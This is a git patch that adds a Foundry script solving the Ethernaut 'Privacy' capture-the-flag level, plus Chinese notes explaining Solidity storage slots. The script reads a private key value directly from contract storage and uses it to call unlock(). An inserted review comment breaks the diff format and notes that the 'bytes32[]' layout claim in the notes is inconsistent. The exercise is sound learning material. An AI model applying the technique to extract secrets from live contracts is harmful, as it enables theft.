From ef0f7810ee2463776207aeb69fb8f6b7ce99ea4e Mon Sep 17 00:00:00 2001
From: Kuan-Hao Chen <35591407+nghdavid@users.noreply.github.com>
Date: Sat, 21 Sep 2024 23:30:32 +0800
Subject: [PATCH] 2024/09/21 note
---
 Writeup/nghdavid/Ethernaut/11/11.sol | 34 ++++++++++++++++++++++++++++
 nghdavid.md | 10 ++++++++
 2 files changed, 44 insertions(+)
 create mode 100644 Writeup/nghdavid/Ethernaut/11/11.sol
diff --git a/Writeup/nghdavid/Ethernaut/11/11.sol b/Writeup/nghdavid/Ethernaut/11/11.sol
new file mode 100644
index 00000000..7ebe8473
--- /dev/null
+++ b/Writeup/nghdavid/Ethernaut/11/11.sol
@@ -0,0 +1,34 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.21;
+
+import {Script, console2} from "forge-std/Script.sol";
+import {EthernautHelper} from "../setup/EthernautHelper.sol";
+
+// NOTE You can import your helper contracts & create interfaces here
+
+contract PrivacySolution is Script, EthernautHelper {
+ address constant LEVEL_ADDRESS = 0x131c3249e115491E83De375171767Af07906eA36;
+ uint256 heroPrivateKey = vm.envUint("PRIVATE_KEY");
+
+ function run() public {
+ vm.startBroadcast(heroPrivateKey);
+ // NOTE this is the address of your challenge contract
+ address challengeInstance = createInstance(LEVEL_ADDRESS);
+
+ // YOUR SOLUTION HERE
+
+ /**
+ * Understanding Solidity’s Storage Layout And How To Access State Variables In Storage Slots.
+ */
+ bytes32 key = vm.load(challengeInstance, bytes32(uint256(5)));
+ challengeInstance.call(abi.encodeWithSignature("unlock(bytes16)", bytes16(key)));
+
+
+ // SUBMIT CHALLENGE. (DON'T EDIT)
+ bool levelSuccess = submitInstance(challengeInstance);
+ require(levelSuccess, "Challenge not passed yet");
+ vm.stopBroadcast();
+
+ console2.log(successMessage(12));
+ }
+}
diff --git a/nghdavid.md b/nghdavid.md
index 01c1a3a9..e0620894 100644
--- a/nghdavid.md
+++ b/nghdavid.md
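Review bot: The low-level `challengeInstance.call(...)` in `run()` of 11.sol discards its success flag, so a reverted `unlock` goes unnoticed and the only symptom is the later `require(levelSuccess, "Challenge not passed yet")`. Capture and check the result, `(bool ok, ) = challengeInstance.call(abi.encodeWithSignature("unlock(bytes16)", bytes16(key)));` followed by `require(ok, "unlock failed");`, or call through a typed interface so a typo in the signature string fails at compile time instead of at runtime. The literal slot `5` also needs a comment such as `// slots 0-2 hold the scalar fields, data[0..2] sit in slots 3-5; bytes16(key) keeps the high-order 16 bytes`; that layout holds only if `data` is a fixed-size array, whereas the nghdavid.md note in this commit writes the type as `bytes32[]`, and a dynamic array would keep its elements at keccak256(slot) + i. It is also worth stating the defensive lesson beside the `vm.load` line: `private` restricts access from other contracts only, every storage slot is readable off-chain, and so secrets must never be kept in contract storage.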
@@ -369,5 +369,15 @@ abstract contract ReentrancyGuard {
 - 首先要呼叫關卡合約的donate(),讓攻擊者的balance有值
 - 再呼叫關卡合約的withdraw(),讓重入攻擊一直重複到balance < 0
+### 2024.09.21
+# Ethernut第十二題
+- 這題的關鍵是要找到data[2]的值做為key
+- 但data為private varible,所以用vm.load去讀取
+- bool佔據1個byte,在storage slot 0
+- ID為uint256,佔據32byte,在storage slot 1
+- flattening、denomination、awkwardness,加起來佔據32byte,在storage slot 2
+- data的type為bytes32[],所以每一個值會對應到一個slot
+- data[0]對應到slot3,data[1]對應到slot4,data[2]對應到slot5
+- 所以key在slot5,用vm.load(challengeInstance, bytes32(uint256(5)))就能讀取出來key